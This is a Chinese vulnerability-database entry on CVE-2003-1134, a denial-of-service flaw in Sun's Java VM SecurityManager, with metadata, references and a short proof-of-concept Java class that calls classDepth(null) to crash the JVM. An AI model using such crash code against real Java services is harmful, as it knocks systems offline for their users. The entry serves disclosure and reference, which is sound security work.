Sun Microsystems Java虚拟机安全管理器拒绝服务攻击漏洞

Sun Microsystems Java虚拟机安全管理器拒绝服务攻击漏洞

漏洞ID 1107537 漏洞类型 设计错误
发布时间 2003-10-26 更新时间 2005-10-20
图片[1]-Sun Microsystems Java虚拟机安全管理器拒绝服务攻击漏洞-安全小百科CVE编号 CVE-2003-1134
图片[2]-Sun Microsystems Java虚拟机安全管理器拒绝服务攻击漏洞-安全小百科CNNVD-ID CNNVD-200312-175
漏洞平台 Multiple CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/23292
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-175
|漏洞详情
Java2安全管理器(SecurityManagers)针对系统完整性和安全性进行检查的工具。Java2安全管理器实现存在问题,远程攻击者可以利用这个漏洞对SunJava虚拟机进行拒绝服务攻击。构建特殊的类并运行,会由于NULL指针异常而导致JAVA虚拟机崩溃。
|漏洞EXP
source: http://www.securityfocus.com/bid/8892/info

A problem has been reported in the Sun Microsystems Java Virtual Machine that occurs when implementing the Security Manager. Because of this, an attacker may be able to crash the virtual machine. 

/* InsecurityManager-Demonstration */
/* coded by Marc Schoenefeld */
public class InSecurityManager extends SecurityManager {

public void doit() {
System.out.println("doit");
int o = classDepth(null);
}

public static void main(String[] a) {
InSecurityManager m = new InSecurityManager();
m.doit();
}
}
|参考资料

来源:BID
名称:8892
链接:http://www.securityfocus.com/bid/8892
来源:FULLDISC
名称:20031026Java1.4.2_02InsecurityManagerJVMcrash
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2003-October/012773.html
来源:NSFOCUS
名称:5591
链接:http://www.nsfocus.net/vulndb/5591

相关推荐: IRIX Systour and OutOfBox Vulnerabilities

IRIX Systour and OutOfBox Vulnerabilities 漏洞ID 1105165 漏洞类型 Access Validation Error 发布时间 1996-10-30 更新时间 1996-10-30 CVE编号 N/A CNNV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享